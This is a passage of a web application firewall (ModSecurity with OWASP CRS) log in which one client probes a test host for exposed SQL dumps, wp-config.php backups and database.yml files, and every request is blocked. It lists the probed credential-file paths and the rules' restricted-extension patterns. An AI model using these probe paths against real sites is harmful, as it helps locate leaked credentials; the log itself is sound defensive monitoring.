"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "abaADmAJ710PJa37ZB3ygAAAAAM"]
[Sun Mar 15 10:46:54.976411 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "abaADmAJ710PJa37ZB3ygAAAAAM"]
[Sun Mar 15 10:46:54.976536 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "abaADmAJ710PJa37ZB3ygAAAAAM"]
[Sun Mar 15 10:46:54.998429 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "abaADmAJ710PJa37ZB3ygQAAAAM"]
[Sun Mar 15 10:46:54.998804 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "abaADmAJ710PJa37ZB3ygQAAAAM"]
[Sun Mar 15 10:46:54.998919 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "abaADmAJ710PJa37ZB3ygQAAAAM"]
[Sun Mar 15 10:46:55.020734 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mysql.sql"] [unique_id "abaAD2AJ710PJa37ZB3yggAAAAM"]
[Sun Mar 15 10:46:55.021117 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mysql.sql"] [unique_id "abaAD2AJ710PJa37ZB3yggAAAAM"]
[Sun Mar 15 10:46:55.021243 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mysql.sql"] [unique_id "abaAD2AJ710PJa37ZB3yggAAAAM"]
[Sun Mar 15 10:46:55.043025 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/sql.sql"] [unique_id "abaAD2AJ710PJa37ZB3ygwAAAAM"]
[Sun Mar 15 10:46:55.043404 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/sql.sql"] [unique_id "abaAD2AJ710PJa37ZB3ygwAAAAM"]
[Sun Mar 15 10:46:55.043539 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/sql.sql"] [unique_id "abaAD2AJ710PJa37ZB3ygwAAAAM"]
[Sun Mar 15 10:46:55.065328 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "abaAD2AJ710PJa37ZB3yhAAAAAM"]
[Sun Mar 15 10:46:55.065706 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "abaAD2AJ710PJa37ZB3yhAAAAAM"]
[Sun Mar 15 10:46:55.065835 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "abaAD2AJ710PJa37ZB3yhAAAAAM"]
[Sun Mar 15 10:46:55.087559 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/old.sql"] [unique_id "abaAD2AJ710PJa37ZB3yhQAAAAM"]
[Sun Mar 15 10:46:55.087937 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/old.sql"] [unique_id "abaAD2AJ710PJa37ZB3yhQAAAAM"]
[Sun Mar 15 10:46:55.088064 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/old.sql"] [unique_id "abaAD2AJ710PJa37ZB3yhQAAAAM"]
[Sun Mar 15 10:46:55.110377 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abaAD2AJ710PJa37ZB3yhgAAAAM"]
[Sun Mar 15 10:46:55.110546 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abaAD2AJ710PJa37ZB3yhgAAAAM"]
[Sun Mar 15 10:46:55.110664 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abaAD2AJ710PJa37ZB3yhgAAAAM"]
[Sun Mar 15 10:46:55.132552 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "abaAD2AJ710PJa37ZB3yhwAAAAM"]
[Sun Mar 15 10:46:55.132785 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "abaAD2AJ710PJa37ZB3yhwAAAAM"]
[Sun Mar 15 10:46:55.132956 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "abaAD2AJ710PJa37ZB3yhwAAAAM"]
[Sun Mar 15 10:46:55.133078 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "abaAD2AJ710PJa37ZB3yhwAAAAM"]
[Sun Mar 15 10:46:55.156794 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "abaAD2AJ710PJa37ZB3yiAAAAAM"]
[Sun Mar 15 10:46:55.156966 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "abaAD2AJ710PJa37ZB3yiAAAAAM"]
[Sun Mar 15 10:46:55.157082 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "abaAD2AJ710PJa37ZB3yiAAAAAM"]
[Sun Mar 15 10:46:55.179644 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php~"] [unique_id "abaAD2AJ710PJa37ZB3yiQAAAAM"]
[Sun Mar 15 10:46:55.179835 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php~"] [unique_id "abaAD2AJ710PJa37ZB3yiQAAAAM"]
[Sun Mar 15 10:46:55.179950 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php~"] [unique_id "abaAD2AJ710PJa37ZB3yiQAAAAM"]
[Sun Mar 15 10:46:55.269934 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "abaAD2AJ710PJa37ZB3yjQAAAAM"]
[Sun Mar 15 10:46:55.270114 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "abaAD2AJ710PJa37ZB3yjQAAAAM"]
[Sun Mar 15 10:46:55.270224 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "abaAD2AJ710PJa37ZB3yjQAAAAM"]
[Sun Mar 15 10:46:55.292442 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/database.yml"] [unique_id "abaAD2AJ710PJa37ZB3yjgAAAAM"]
[Sun Mar 15 10:46:55.292605 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/database.yml"] [unique_id "abaAD2AJ710PJa37ZB3yjgAAAAM"]
[Sun Mar 15 10:46:55.292735 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/database.yml"] [unique_id "abaAD2AJ710PJa37ZB3yjgAAAAM"]
